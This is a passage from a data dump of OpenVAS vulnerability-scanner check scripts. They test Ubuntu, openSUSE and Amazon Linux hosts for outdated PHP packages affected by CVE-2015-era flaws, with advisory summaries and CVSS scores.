rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc-debuginfo\", rpm:\"php5-xmlrpc-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter-debuginfo\", rpm:\"php5-xmlwriter-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl-debuginfo\", rpm:\"php5-xsl-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip-debuginfo\", rpm:\"php5-zip-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib-debuginfo\", rpm:\"php5-zlib-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:12", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-01T00:00:00", "type": "openvas", "title": "Ubuntu Update for php5 USN-2758-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6833", "CVE-2015-6831", "CVE-2015-5590", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-5589", "CVE-2015-6832", "CVE-2015-6838"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842472", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842472", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for php5 USN-2758-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842472\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-01 07:12:58 +0200 (Thu, 01 Oct 2015)\");\n script_cve_id(\"CVE-2015-5589\", \"CVE-2015-5590\", \"CVE-2015-6831\", \"CVE-2015-6834\",\n \"CVE-2015-6835\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-6836\",\n \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for php5 USN-2758-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php5'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the PHP phar extension\nincorrectly handled certain files. A remote attacker could use this issue to cause\nPHP to crash, resulting in a denial of service. (CVE-2015-5589)\n\nIt was discovered that the PHP phar extension incorrectly handled certain\nfilepaths. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-5590)\n\nTaoguang Chen discovered that PHP incorrectly handled unserializing\nobjects. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-6831, CVE-2015-6834, CVE-2015-6835\n\nSean Heelan discovered that PHP incorrectly handled unserializing\nobjects. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-6832)\n\nIt was discovered that the PHP phar extension incorrectly handled certain\narchives. A remote attacker could use this issue to cause files to be\nplaced outside of the destination directory. (CVE-2015-6833)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated\ndata types. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-6836)\n\nIt was discovered that the PHP XSLTProcessor class incorrectly handled\ncertain data. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service. (CVE-2015-6837)\");\n script_tag(name:\"affected\", value:\"php5 on Ubuntu 15.04,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2758-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2758-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(15\\.04|14\\.04 LTS|12\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU15.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.6.4+dfsg-4ubuntu6.3\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.6.4+dfsg-4ubuntu6.3\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.6.4+dfsg-4ubuntu6.3\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.6.4+dfsg-4ubuntu6.3\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.5.9+dfsg-1ubuntu4.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.5.9+dfsg-1ubuntu4.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.5.9+dfsg-1ubuntu4.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.5.9+dfsg-1ubuntu4.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.3.10-1ubuntu3.20\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.10-1ubuntu3.20\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.3.10-1ubuntu3.20\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.3.10-1ubuntu3.20\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:59:50", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-10-22T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-601)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-7803", "CVE-2015-6835", "CVE-2015-7804"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120520", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120520", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120520\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-10-22 08:25:44 +0300 (Thu, 22 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-601)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in PHP. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update php56 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-601.html\");\n script_cve_id(\"CVE-2015-7803\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-7804\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"php56-xmlrpc\", rpm:\"php56-xmlrpc~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-xml\", rpm:\"php56-xml~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-odbc\", rpm:\"php56-odbc~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-imap\", rpm:\"php56-imap~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-pdo\", rpm:\"php56-pdo~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-debuginfo\", rpm:\"php56-debuginfo~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-gmp\", rpm:\"php56-gmp~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mcrypt\", rpm:\"php56-mcrypt~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-dba\", rpm:\"php56-dba~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-tidy\", rpm:\"php56-tidy~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-enchant\", rpm:\"php56-enchant~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-opcache\", rpm:\"php56-opcache~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-common\", rpm:\"php56-common~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-devel\", rpm:\"php56-devel~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-fpm\", rpm:\"php56-fpm~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mssql\", rpm:\"php56-mssql~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-pspell\", rpm:\"php56-pspell~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-snmp\", rpm:\"php56-snmp~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-process\", rpm:\"php56-process~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-cli\", rpm:\"php56-cli~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mysqlnd\", rpm:\"php56-mysqlnd~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-ldap\", rpm:\"php56-ldap~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-gd\", rpm:\"php56-gd~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-intl\", rpm:\"php56-intl~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-embedded\", rpm:\"php56-embedded~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-dbg\", rpm:\"php56-dbg~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56\", rpm:\"php56~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-bcmath\", rpm:\"php56-bcmath~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-soap\", rpm:\"php56-soap~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-pgsql\", rpm:\"php56-pgsql~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-recode\", rpm:\"php56-recode~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mbstring\", rpm:\"php56-mbstring~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T22:59:14", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-10-22T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-602)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-7803", "CVE-2015-6835", "CVE-2015-7804"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120396", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120396", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120396\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-10-22 08:25:44 +0300 (Thu, 22 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-602)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in PHP. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update php55 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-602.html\");\n script_cve_id(\"CVE-2015-7803\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-7804\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"php55-embedded\", rpm:\"php55-embedded~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-bcmath\", rpm:\"php55-bcmath~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-snmp\", rpm:\"php55-snmp~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-cli\", rpm:\"php55-cli~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mbstring\", rpm:\"php55-mbstring~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-ldap\", rpm:\"php55-ldap~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-pgsql\", rpm:\"php55-pgsql~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-pdo\", rpm:\"php55-pdo~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-pspell\", rpm:\"php55-pspell~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-dba\", rpm:\"php55-dba~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-common\", rpm:\"php55-common~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-odbc\", rpm:\"php55-odbc~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-enchant\", rpm:\"php55-enchant~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-xml\", rpm:\"php55-xml~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-soap\", rpm:\"php55-soap~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-fpm\", rpm:\"php55-fpm~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-gmp\", rpm:\"php55-gmp~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-xmlrpc\", rpm:\"php55-xmlrpc~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-opcache\", rpm:\"php55-opcache~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-process\", rpm:\"php55-process~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-debuginfo\", rpm:\"php55-debuginfo~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mcrypt\", rpm:\"php55-mcrypt~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55\", rpm:\"php55~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-devel\", rpm:\"php55-devel~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-imap\", rpm:\"php55-imap~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mssql\", rpm:\"php55-mssql~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mysqlnd\", rpm:\"php55-mysqlnd~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-recode\", rpm:\"php55-recode~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-tidy\", rpm:\"php55-tidy~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-intl\", rpm:\"php55-intl~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-gd\", rpm:\"php55-gd~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:18", "description": "This host is installed with PHP and is prone\n to remote code execution vulnerability.", "cvss3": {}, "published": "2016-03-01T00:00:00", "type": "openvas", "title": "PHP 'serialize_function_call' Function Type Confusion Vulnerability - Mar16 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6836"], "modified": "2018-11-20T00:00:00", "id": "OPENVAS:1361412562310807505", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807505", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_type_confusion_rce_vuln_mar16_lin.nasl 2016-03-01 16:56:54Z March$\n#\n# PHP 'serialize_function_call' Function Type Confusion Vulnerability - Mar16 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807505\");\n script_version(\"$Revision: 12431 $\");\n script_cve_id(\"CVE-2015-6836\");\n script_bugtraq_id(76644);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-20 10:21:00 +0100 (Tue, 20 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-01 16:56:54 +0530 (Tue, 01 Mar 2016)\");\n script_name(\"PHP 'serialize_function_call' Function Type Confusion Vulnerability - Mar16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to 'SoapClient __call'\n method in 'ext/soap/soap.c' scripr does not properly manage headers.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this 